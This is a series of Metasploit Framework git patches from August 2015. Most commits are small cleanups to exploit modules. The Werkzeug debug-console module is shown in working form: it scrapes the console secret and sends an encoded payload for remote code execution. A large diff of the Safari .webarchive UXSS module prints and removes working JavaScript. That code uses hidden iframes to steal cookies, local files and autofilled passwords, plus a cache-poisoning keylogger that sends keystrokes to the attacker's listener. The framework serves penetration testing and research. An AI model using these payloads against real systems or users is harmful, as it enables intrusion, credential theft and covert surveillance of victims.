-          meterpreter. Additionally, the ShowDescription option can be set
-          to 'true' to a detailed description on the suggested exploits.
+          meterpreter.
 
           It's important to note that not all local exploits will be fired.
-          They are chosen based on these conditions: session type,
+          Exploits are chosen based on these conditions: session type,
           platform, architecture, and required default options.
         },
         'License'       => MSF_LICENSE,

From bb4116ed9d7ebbf9f5ae5f16d43b1891b94a875e Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 13 Aug 2015 12:37:15 -0500
Subject: [PATCH 0970/1013] Avoid msftidy.rb rule breaking on missing newline

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index b2a98e1245..6aa41e1263 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -318,4 +318,5 @@ class Metasploit3 < Msf::Exploit::Remote
     res = data + [bkd_crc].pack('<L')
     res
   end
-end
\ No newline at end of file
+end
+

From d54ee19ce9a3dbc9ca7dccdda4f7662f1754a1dc Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 13 Aug 2015 13:25:55 -0500
Subject: [PATCH 0971/1013] Clean up module

---
 .../exploits/multi/http/werkzeug_debug_rce.rb | 58 +++++++++++--------
 1 file changed, 33 insertions(+), 25 deletions(-)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index 30843aab57..4ec74e7e02 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -7,33 +7,37 @@ require 'msf/core'
 require 'rex'
 
 class Metasploit4 < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
+
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize
-    super(
-      'Name'        => 'Werkzeug Debug Shell Command Execution',
-      'Description' => %q{
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Werkzeug Debug Shell Command Execution',
+      'Description'    => %q{
         This module will exploit the Werkzeug debug console to put down a
-        python shell.  This debugger "must never be used on production
-        machines", but sometimes slips passed testing.
+        Python shell. This debugger "must never be used on production
+        machines" but sometimes slips passed testing.
+
         Tested against:
-            0.9.6 on Debian
-            0.9.6 on Centos
-            0.10  on Debian
+          0.9.6 on Debian
+          0.9.6 on Centos
+          0.10  on Debian
       },
-      'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
-      'References'  =>
-          [
-            [ 'URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
-          ],
-      'License'     => MSF_LICENSE,
+      'Author'         => 'h00die <mike[at]shorebreaksecurity.com>',
+      'References'     =>
+        [
+          ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+        ],
+      'License'        => MSF_LICENSE,
       'Platform'       => ['python'],
       'Targets'        => [[ 'werkzeug 0.10 and older', {}]],
       'Arch'           => ARCH_PYTHON,
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jun 28 2015',
-    )
+      'DisclosureDate' => 'Jun 28 2015'
+    ))
+
     register_options(
       [
         OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
@@ -43,23 +47,26 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'method'   => 'GET',
-      'uri'      => normalize_uri(datastore['TARGETURI'])
+      'method' => 'GET',
+      'uri'    => normalize_uri(datastore['TARGETURI'])
     )
+
     # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
     if res && res.body =~ /Werkzeug powered traceback interpreter/
       return Exploit::CheckCode::Appears
     end
+
     Exploit::CheckCode::Safe
   end
 
   def exploit
     # first we need to get the SECRET code
     res = send_request_cgi(
-      'method'   => 'GET',
-      'uri'      => normalize_uri(datastore['TARGETURI'])
+      'method' => 'GET',
+      'uri'    => normalize_uri(datastore['TARGETURI'])
     )
-    if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
+
+    if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = $1
       vprint_status("Secret Code: #{secret}")
       send_request_cgi(
@@ -67,13 +74,14 @@ class Metasploit4 < Msf::Exploit::Remote
         'uri'      => normalize_uri(datastore['TARGETURI']),
         'vars_get' => {
           '__debugger__' => 'yes',
-          'cmd' => payload.encoded,
-          'frm' => '0',
-          's' => secret
+          'cmd'          => payload.encoded,
+          'frm'          => '0',
+          's'            => secret
         }
       )
     else
       print_error('Secret code not detected.')
     end
   end
+
 end

From 3bd6c4cee4e00ea6de35ada5386529d4addca021 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 13 Aug 2015 14:16:09 -0500
Subject: [PATCH 0972/1013] Add a comma

---
 modules/exploits/multi/ssh/sshexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 582fd47035..51a57cbc44 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'      => %q{
         This module connects to the target system and executes the necessary
         commands to run the specified payload via SSH. If a native payload is
-        specified an appropriate stager will be used.
+        specified, an appropriate stager will be used.
       },
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>

From 02c6ea31bb45e05f70277f45515722b985db2045 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 13 Aug 2015 14:42:21 -0500
Subject: [PATCH 0973/1013] Use the more recent HD version as default target

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index 6aa41e1263..dd83c0b103 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Jul 29 2015',
-      'DefaultTarget'  => 0))
+      'DefaultTarget'  => 1))
 
     register_options(
       [

From 84144bf6cf9650f83511771290b2d639b35ac895 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Thu, 13 Aug 2015 23:27:48 -0500
Subject: [PATCH 0974/1013] Update webarchive_uxss to use the webarchive mixin.

- Fixes extension installation to use a new window, not an iframe
- Steals the entire cookie file
- Removes cache poisoning scripts, which no longer seem to work
---
 .../gather/apple_safari_webarchive_uxss.rb    | 864 +-----------------
 1 file changed, 44 insertions(+), 820 deletions(-)

diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
index fa826e67d2..b62865e0ff 100644
--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -4,28 +4,24 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/format/webarchive'
 require 'uri'
 
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Format::Webarchive
   include Msf::Auxiliary::Report
 
-  # [Array<Array<Hash>>] list of poisonable scripts per user-specified URLS
-  attr_accessor :scripts_to_poison
-
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Apple Safari .webarchive File Format UXSS',
+      'Name'           => 'Mac OS X Safari .webarchive File Format UXSS',
       'Description'    => %q{
-        This module exploits a security context vulnerability that is inherent
-        in Safari's .webarchive file format. The format allows you to
-        specify both domain and content, so we can run arbitrary script in the
-        context of any domain. This allows us to steal cookies, file URLs, and saved
-        passwords from any website we want -- in other words, it is a universal
-        cross-site scripting vector (UXSS). On sites that link to cached javascripts,
-        we can additionally poison user's browser cache and install keyloggers.
+        Generates a .webarchive file for Mac OS X Safari that will attempt to
+        inject cross-domain Javascript (UXSS), silently install a browser
+        extension, collect user information, steal the cookie database,
+        and steal arbitrary local files.
       },
       'License'        => MSF_LICENSE,
       'Author'         => 'joev',
@@ -34,785 +30,51 @@ class Metasploit3 < Msf::Auxiliary
           ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format']
         ],
       'DisclosureDate' => 'Feb 22 2013',
-      'Actions'     =>
-        [
-          [ 'WebServer' ]
-        ],
-      'PassiveActions' =>
-        [
-          'WebServer'
-        ],
+      'Actions'        => [ [ 'WebServer' ] ],
+      'PassiveActions' => [ 'WebServer' ],
       'DefaultAction'  => 'WebServer'))
-
-    register_options(
-      [
-        OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
-        OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http://rapid7.com http://example.com']),
-        OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
-        OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive.', '/msf.webarchive']),
-        OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
-        OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
-        OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
-        OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
-        OptBool.new('INSTALL_KEYLOGGERS', [true, "Attempt to poison the user's cache with a javascript keylogger.", true]),
-        OptBool.new('STEAL_FORM_DATA', [true, "Enable form autofill stealing.", true]),
-        OptBool.new('ENABLE_POPUPS', [false, "Enable the popup window fallback method for stealing form data.", true])
-      ],
-      self.class)
   end
 
   def run
-    if should_install_keyloggers?
-      print_status("Fetching URLs to parse and look for cached assets...")
-      self.scripts_to_poison = find_cached_scripts
+    if datastore["URIPATH"].blank?
+      datastore["URIPATH"] = "/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
     end
+
     print_status("Creating '#{datastore['FILENAME']}' file...")
     file_create(webarchive_xml)
-    print_status("Running WebServer...")
-    start_http
-  end
-
-  def cleanup
-    super
-    # clear my resource, deregister ref, stop/close the HTTP socket
-    begin
-      @http_service.remove_resource(collect_data_uri)
-      @http_service.deref
-      @http_service.stop
-      @http_service.close
-      @http_service = nil
-    rescue
-    end
-  end
-
-  #
-  # Ensures that gzip can be used.  If not, an exception is generated.  The
-  # exception is only raised if the DisableGzip advanced option has not been
-  # set.
-  #
-  def use_zlib
-    if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
-      fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set.  Don't do that!")
-    end
-  end
-
-  #
-  # Handle the HTTP request and return a response.  Code borrorwed from:
-  # msf/core/exploit/http/server.rb
-  #
-  def start_http(opts={})
-    # Ensture all dependencies are present before initializing HTTP
-    use_zlib
-
-    comm = datastore['ListenerComm']
-    if (comm.to_s == "local")
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
-
-    # Default the server host / port
-    opts = {
-      'ServerHost' => datastore['SRVHOST'],
-      'ServerPort' => datastore['SRVPORT'],
-      'Comm'       => comm
-    }.update(opts)
-
-    # Start a new HTTP server
-    @http_service = Rex::ServiceManager.start(
-      Rex::Proto::Http::Server,
-      opts['ServerPort'].to_i,
-      opts['ServerHost'],
-      datastore['SSL'],
-      {
-        'Msf'        => framework,
-        'MsfExploit' => self,
-      },
-      opts['Comm'],
-      datastore['SSLCert']
-    )
-
-    @http_service.server_name = datastore['HTTP::server_name']
-
-    # Default the procedure of the URI to on_request_uri if one isn't
-    # provided.
-    uopts = {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => collect_data_uri
-    }.update(opts['Uri'] || {})
-
-    proto = (datastore["SSL"] ? "https" : "http")
-    print_status("Data capture URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
-
-    if (opts['ServerHost'] == '0.0.0.0')
-      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
-    end
-
-    # Add path to resource
-    @service_path = uopts['Path']
-    @http_service.add_resource(uopts['Path'], uopts)
-
-    # Add path to download
-    uopts = {
-      'Proc' => Proc.new { |cli, req|
-        resp = Rex::Proto::Http::Response::OK.new
-        resp['Content-Type'] = 'application/x-webarchive'
-        resp.body = @xml.to_s
-        cli.send_response resp
-      },
-      'Path' => webarchive_download_url
-    }.update(opts['Uri'] || {})
-    @http_service.add_resource(webarchive_download_url, uopts)
-
-    print_status("Download URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
-
-    # As long as we have the http_service object, we will keep the ftp server alive
-    while @http_service
-      select(nil, nil, nil, 1)
-    end
+    exploit
   end
 
   def on_request_uri(cli, request)
-    begin
-      data_str = if request.body.size > 0
-        request.body
-      else
-        request.qstring['data']
+    if request.method =~ /post/i
+      data_str = request.body.to_s
+      begin
+        data = JSON::parse(data_str || '')
+        file = record_data(data, cli)
+        send_response_html(cli, '')
+        print_good "#{data_str.length} chars received and stored to #{file}"
+      rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
+        file = record_data(data_str, cli)
+        print_error "Invalid JSON stored in #{file}"
+        send_response_html(cli, '')
       end
-      data = JSON::parse(data_str || '')
-      file = record_data(data, cli)
-      send_response_html(cli, '')
-      print_good "#{data_str.length} chars received and stored to #{file}"
-    rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
-      print_error "Invalid JSON received: #{data_str}"
-      send_not_found(cli)
+    else
+      send_response(cli, webarchive_xml, {
+        'Content-Type' => 'application/x-webarchive',
+        'Content-Disposition' => "attachment; filename=\"#{datastore['FILENAME']}\""
+      })
     end
   end
 
   # @param [Hash] data the data to store in the log
   # @return [String] filename where we are storing the data
   def record_data(data, cli)
-    @client_cache ||= Hash.new({})
-    @client_cache[cli.peerhost]['file'] ||= store_loot(
-      "safari.client", "text/plain", cli.peerhost, '', "safari_webarchive", "Webarchive Collected Data"
+    if data.is_a? Hash
+      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
+    end
+    store_loot(
+      file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
     )
-    file = @client_cache[cli.peerhost]['file']
-
-    @client_cache[cli.peerhost]['data'] ||= []
-    @client_cache[cli.peerhost]['data'].push(data)
-    data_str = JSON.generate(@client_cache[cli.peerhost]['data'])
-
-    File.write(file, data_str)
-
-    file
-  end
-
-  ### ASSEMBLE THE WEBARCHIVE XML ###
-
-  # @return [String] contents of webarchive as an XML document
-  def webarchive_xml
-    return @xml if not @xml.nil? # only compute xml once
-    @xml = webarchive_header
-    urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
-    @xml << webarchive_footer
-  end
-
-  # @return [String] the first chunk of the webarchive file, containing the WebMainResource
-  def webarchive_header
-    %Q|
-      <?xml version="1.0" encoding="UTF-8"?>
-      <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
-        "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-      <plist version="1.0">
-      <dict>
-        <key>WebMainResource</key>
-        <dict>
-          <key>WebResourceData</key>
-          <data>
-            #{Rex::Text.encode_base64(iframes_container_html)}</data>
-          <key>WebResourceFrameName</key>
-          <string></string>
-          <key>WebResourceMIMEType</key>
-          <string>text/html</string>
-          <key>WebResourceTextEncodingName</key>
-          <string>UTF-8</string>
-          <key>WebResourceURL</key>
-          <string>file:///</string>
-        </dict>
-        <key>WebSubframeArchives</key>
-        <array>
-    |
-  end
-
-  # @return [String] the XML markup to insert into the webarchive for each unique
-  #   iframe (we use one frame per site we want to steal)
-  def webarchive_iframe(url, idx)
-    %Q|
-      <dict>
-        <key>WebMainResource</key>
-        <dict>
-          <key>WebResourceData</key>
-          <data>
-          #{Rex::Text.encode_base64(iframe_content_for_url(url))}</data>
-          <key>WebResourceFrameName</key>
-          <string>&lt;!--framePath //&lt;!--frame#{idx}--&gt;--&gt;</string>
-          <key>WebResourceMIMEType</key>
-          <string>text/html</string>
-          <key>WebResourceTextEncodingName</key>
-          <string>UTF-8</string>
-          <key>WebResourceURL</key>
-          <string>#{escape_xml url}</string>
-        </dict>
-        #{webarchive_iframe_subresources(url, idx)}
-      </dict>
-    |
-  end
-
-  # @return [String] the XML mark up for adding a set of "stored" resources at
-  #   the given URLs
-  def webarchive_iframe_subresources(url, idx)
-    %Q|
-      <key>WebSubresources</key>
-      <array>
-        #{webarchive_resources_for_poisoning_cache(url)}
-      </array>
-    |
-  end
-
-  # @return [String] the XML markup to insert into the webarchive for each unique
-  # iframe (we use one frame per site we want to steal)
-  # @return '' if msf user does not want to poison cache
-  def webarchive_resources_for_poisoning_cache(url)
-    if not should_install_keyloggers? then return '' end
-
-    url_idx = urls.index(url)
-    scripts = scripts_to_poison[url_idx] || []
-    xml_dicts = scripts.map do |script|
-      script_body = inject_js_keylogger(script[:body])
-      %Q|
-      <dict>
-        <key>WebResourceData</key>
-        <data>
-        #{Rex::Text.encode_base64(script_body)}
-        </data>
-        <key>WebResourceMIMEType</key>
-        <string>application/javascript</string>
-        <key>WebResourceResponse</key>
-        <data>
-        #{Rex::Text.encode_base64 web_response_xml(script)}
-        </data>
-        <key>WebResourceURL</key>
-        <string>#{escape_xml script[:url]}</string>
-      </dict>
-      |
-    end
-    xml_dicts.join
-  end
-
-  # @return [String] the closing chunk of the webarchive XML code
-  def webarchive_footer
-    %Q|
-        </array>
-      </dict>
-      </plist>
-    |
-  end
-
-  # @param script [Hash] containing HTTP headers from the request
-  # @return [String] xml markup for serialized WebResourceResponse containing good
-  # stuff like HTTP/caching headers. Safari appears to do the following:
-  # NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
-  # [a encodeObject:response forKey:@"WebResourceResponse"];
-  def web_response_xml(script)
-    # this is a serialized NSHTTPResponse, i'm too lazy to write a
-    # real encoder so yay lets use string interpolation.
-    # ripped this straight out of a webarchive save
-    script['content-length'] = script[:body].length
-    whitelist = %w(content-type content-length date etag
-                    Last-Modified cache-control expires)
-    headers = script.clone.delete_if { |k, v| not whitelist.include? k }
-
-    key_set = headers.keys.sort
-    val_set = key_set.map { |k| headers[k] }
-    key_refs = key_set.each_with_index.map do |k, i|
-      { 'CF$UID' => 9+i }
-    end
-    val_refs = key_set.each_with_index.map do |k, i|
-      { 'CF$UID' => 9+key_set.length+i }
-    end
-  %Q|
-    <?xml version="1.0" encoding="UTF-8"?>
-    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-    <plist version="1.0">
-    <dict>
-      <key>$archiver</key>
-      <string>NSKeyedArchiver</string>
-      <key>$objects</key>
-      <array>
-        <string>$null</string>
-        <dict>
-          <key>$0</key>
-          <integer>8</integer>
-          <key>$1</key>
-          <integer>1</integer>
-          <key>$10</key>
-          <integer>8</integer>
-          <key>$11</key>
-          <integer>0</integer>
-          <key>$2</key>
-          <integer>7</integer>
-          <key>$3</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>2</integer>
-          </dict>|+
-          (4..7).map do |i|
-            %Q|
-              <key>$#{i}</key>
-              <dict>
-                <key>CF$UID</key>
-                <integer>#{i+1}</integer>
-              </dict>|
-          end.join("\n") + %Q|
-          <key>$8</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>#{8+key_set.length*2+2}</integer>
-          </dict>
-          <key>$9</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>0</integer>
-          </dict>
-          <key>$class</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>#{8+key_set.length*2+3}</integer>
-          </dict>
-        </dict>
-        <dict>
-          <key>$class</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>4</integer>
-          </dict>
-          <key>NS.base</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>0</integer>
-          </dict>
-          <key>NS.relative</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>3</integer>
-          </dict>
-        </dict>
-        <string>#{escape_xml script[:url]}</string>
-        <dict>
-          <key>$classes</key>
-          <array>
-            <string>NSURL</string>
-            <string>NSObject</string>
-          </array>
-          <key>$classname</key>
-          <string>NSURL</string>
-        </dict>
-        <real>388430153.25252098</real>
-        <integer>1</integer>
-        <integer>200</integer>
-        <dict>
-          <key>$class</key>
-          <dict>
-            <key>CF$UID</key>
-            <integer>#{8+key_set.length*2+1}</integer>
-          </dict>
-          <key>NS.keys</key>
-          <array>|+
-          key_set.each_with_index.map do |k, i|
-            %Q|<dict>
-              <key>CF$UID</key>
-              <integer>#{9+i}</integer>
-            </dict>|
-          end.join("\n") + %Q|
-          </array>
-          <key>NS.objects</key>
-          <array>|+
-          val_set.each_with_index.map do |k, i|
-            %Q|<dict>
-              <key>CF$UID</key>
-              <integer>#{9+key_set.length+i}</integer>
-            </dict>|
-          end.join("\n") + %Q|
-          </array>
-        </dict>
-        #{key_set.map{|s| "<string>#{s}</string>" }.join("\n")}
-        #{val_set.map{|s| "<string>#{s}</string>" }.join("\n")}
-        <dict>
-          <key>$classes</key>
-          <array>
-            <string>NSMutableDictionary</string>
-            <string>NSDictionary</string>
-            <string>NSObject</string>
-          </array>
-          <key>$classname</key>
-          <string>NSMutableDictionary</string>
-        </dict>
-        <integer>107961</integer>
-        <dict>
-          <key>$classes</key>
-          <array>
-            <string>NSHTTPURLResponse</string>
-            <string>NSURLResponse</string>
-            <string>NSObject</string>
-          </array>
-          <key>$classname</key>
-          <string>NSHTTPURLResponse</string>
-        </dict>
-      </array>
-      <key>$top</key>
-      <dict>
-        <key>WebResourceResponse</key>
-        <dict>
-          <key>CF$UID</key>
-          <integer>1</integer>
-        </dict>
-      </dict>
-      <key>$version</key>
-      <integer>100000</integer>
-    </dict>
-    </plist>
-    |
-  end
-
-
-  #### JS/HTML CODE ####
-
-  # Wraps the result of the block in an HTML5 document and body
-  def wrap_with_doc(&blk)
-    %Q|
-      <!doctype html>
-      <html>
-        <body>
-          #{yield}
-        </body>
-      </html>
-    |
-  end
-
-  # Wraps the result of the block with <script> tags
-  def wrap_with_script(&blk)
-    "<script>#{yield}</script>"
-  end
-
-  # @return [String] mark up for embedding the iframes for each URL in a place that is
-  # invisible to the user
-  def iframes_container_html
-    hidden_style = "position:fixed; left:-600px; top:-600px;"
-    wrap_with_doc do
-      frames = urls.map { |url| "<iframe src='#{url}' style='#{hidden_style}'></iframe>" }
-      communication_js + frames.join + injected_js_helpers + steal_files + message
-    end
-  end
-
-  # @return [String] javascript code, wrapped in script tags, that is inserted into the
-  # WebMainResource (parent) frame so that child frames can communicate "up" to the parent
-  # and send data out to the listener
-  def communication_js
-    wrap_with_script do
-      %Q|
-        window.addEventListener('message', function(event){
-          var x = new XMLHttpRequest;
-          x.open('POST', '#{backend_url}#{collect_data_uri}', true);
-          x.send(event.data);
-        });
-      |
-    end
-  end
-
-  # @return [String] all the HTML markup required for executing the chosen attacks
-  def iframe_content_for_url(url)
-    # this JS code runs inside the iframes, in the context of url
-    html = ''
-    html << injected_js_helpers
-    html << trigger_cache_poison_for_url(url) if should_install_keyloggers?
-    html << steal_cookies_for_url(url)        if should_steal_cookies?
-    html << steal_form_data_for_url(url)      if should_steal_form?
-    wrap_with_doc { html }
-  end
-
-  # @return [String] javascript code, wrapped in a script tag, that steals the cookies
-  # and response body/headers, and passes them back up to the parent.
-  def steal_cookies_for_url(url)
-    wrap_with_script do
-      %Q|
-        try {
-          var req = new XMLHttpRequest();
-          var sent = false;
-          req.open('GET', '#{url}', true);
-          req.onreadystatechange = function() {
-            if (req.readyState==4 && !sent) {
-              sendData('#{url}', {
-                response_headers: req.getAllResponseHeaders(),
-                response_body: req.responseText
-              });
-              sent = true;
-            }
-          };
-          req.send(null);
-        } catch (e) {}
-        sendData('cookie', document.cookie);
-      |
-    end
-  end
-
-  # @return [String] javascript code, wrapped in a script tag, that steals local files
-  # and sends them back to the listener. This code is executed in the WebMainResource (parent)
-  # frame, which runs in the file:// protocol
-  def steal_files
-    return '' unless should_steal_files?
-    urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ')
-    wrap_with_script do
-      %Q|
-        var filesStr = "#{urls_str}";
-        var files = filesStr.trim().split(/\s+/);
-        var stealFile = function(url) {
-          var req = new XMLHttpRequest();
-          var sent = false;
-          req.open('GET', url, true);
-          req.onreadystatechange = function() {
-            if (!sent && req.responseText && req.responseText.length > 0) {
-              sendData(url, req.responseText);
-              sent = true;
-            }
-          };
-          req.send(null);
-        };
-        for (var i = 0; i < files.length; i++) stealFile(files[i]);
-      |
-    end
-  end
-
-  # @return [String] javascript code, wrapped in a script tag, that steals autosaved form
-  # usernames and passwords. The attack first tries to render the target URL in an iframe,
-  # and steal populated passwords from there. If the site disables iframes through the
-  # X-Frame-Options header, we try popping open a new window and rendering the site in that.
-  def steal_form_data_for_url(url)
-    wrap_with_script do
-      %Q|
-        var stealFormData = function(win, completeFn) {
-          var doc = win.document;
-          if (!doc) doc = win.contentDocument;
-          return function() {
-            var data = {}, found = false;
-            try {
-              var inputs = doc.querySelectorAll(
-                'input[type=email],input[type=text],input[type=password],textarea'
-              );
-              for (var i = 0; i < inputs.length; i++) {
-                if (inputs[i].value && inputs[i].value.length > 0) {
-                  found = true;
-                  data[inputs[i].name] = inputs[i].value;
-                }
-              }
-              if (found) sendData(data);
-              if (completeFn) completeFn.call();
-            } catch(e) {}
-          }
-        }
-
-        var tryInNewWin = function() {
-          var y = window.open('#{url}', '_blank', 'height=0;width=0;location=0;left=200;');
-          if (y) {
-            var int1 = window.setInterval(function(){y.blur();window.top.focus();}, 20);
-            y.addEventListener('load', function() {
-              window.setTimeout(stealFormData(y, function(){
-                if (int1) {
-                  window.clearInterval(int1);
-                  int1 = null;
-                }
-                y.close();
-              }), 500);
-            }, false);
-          }
-        };
-        var tryInIframe = function(){
-          var i = document.createElement('iframe');
-          i.style = 'position:absolute;width:2px;height:2px;left:-2000px;top:-2000px;';
-          document.body.appendChild(i);
-          i.src = '#{url}';
-          i.addEventListener('load', function() {
-            window.setTimeout(stealFormData(i), 500);
-          }, false);
-          return i;
-        };
-
-        var iframe = tryInIframe();
-        if (#{should_pop_up?}) {
-          window.setTimeout(function(){
-
-            if (iframe.contentDocument &&
-                iframe.contentDocument.location.href == 'about:blank') {
-              tryInNewWin();
-            }
-          }, 1000)
-        }
-      |
-    end
-  end
-
-  # @return [String] javascript code, wrapped in script tag, that adds a helper function
-  # called "sendData()" that passes the arguments up to the parent frame, where it is
-  # sent out to the listener
-  def injected_js_helpers
-    wrap_with_script do
-      %Q|
-        window.sendData = function(key, val) {
-          var data = {};
-          data[key] = val;
-          window.top.postMessage(JSON.stringify(data), "*")
-        };
-      |
-    end
-  end
-
-  # @return [String] HTML markup that includes a script at the URL we want to poison
-  # We will then install the injected_js_keylogger at the same URL
-  def trigger_cache_poison_for_url(url)
-    url_idx = urls.index(url)
-    scripts_to_poison[url_idx].map { |s|
-      "\n<script src='#{s[:url]}' type='text/javascript'></script>\n"
-    }.join
-  end
-
-  # @param original_js [String] the original contents of the script file
-  # @return [String] the poisoned contents. Once the module has found a valid 304'd script to
-  # poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
-  # appropriate Cache-Control to the webarchive.
-  # @return [String] the original contents if msf user does not want to install keyloggers
-  def inject_js_keylogger(original_js)
-    if not should_install_keyloggers?
-      original_js
-    else
-      frame_name = 'lalala___lalala'
-      secret = '____INSTALLED!??!'
-      %Q|
-        (function(){
-          if (window['#{secret}']) return;
-          window['#{secret}'] = true;
-          document.addEventListener('DOMContentLoaded',function(){
-            var buffer = '';
-            var sendData = function(keystrokes, time) {
-              var img = new Image();
-              data = JSON.stringify({keystrokes: keystrokes, time: time});
-              img.src = '#{backend_url}#{collect_data_uri}?data='+data;
-            }
-            document.addEventListener('keydown', function(e) {
-              var c = String.fromCharCode(e.keyCode);
-              if (c.length > 0) buffer += c;
-            }, true);
-            window.setInterval(function(){
-              if (buffer.length > 0) {
-                sendData(buffer, new Date);
-                buffer = '';
-              }
-            }, 3000)
-          });
-        })();
-        #{original_js}
-      |
-    end
-  end
-
-  # @return [Array<Array<String>>] list of URLs provided by the user mapped to all of the linked
-  # javascript assets in its HTML response.
-  def all_script_urls(pages)
-    pages.map do |url|
-      results = []
-      print_status "Fetching URL #{url}..."
-      # fetch and parse the HTML document
-      doc = Nokogiri::HTML(URI.parse(url).open)
-      # recursively add scripts from iframes
-      doc.css('iframe').each do |iframe|
-        print_status "Checking iframe..."
-        if not iframe.attributes['src'].nil? and not iframe.attributes['src'].value.empty?
-          results += all_script_urls([iframe.attributes['src'].value])
-        end
-      end
-      # add all scripts on the current page
-      doc.css('script').each do |script| # loop over every <script>
-        # external scripts only
-        if not script.attributes['src'].nil? and not script.attributes['src'].value.empty?
-          results << script.attributes['src'].value
-        end
-      end
-      results
-    end
-  end
-
-  # @return [Array<Array<Hash>>] list of headers returned by cacheabke remote javascripts
-  def find_cached_scripts
-    cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
-      begin
-        page_uri = URI.parse(urls[i])
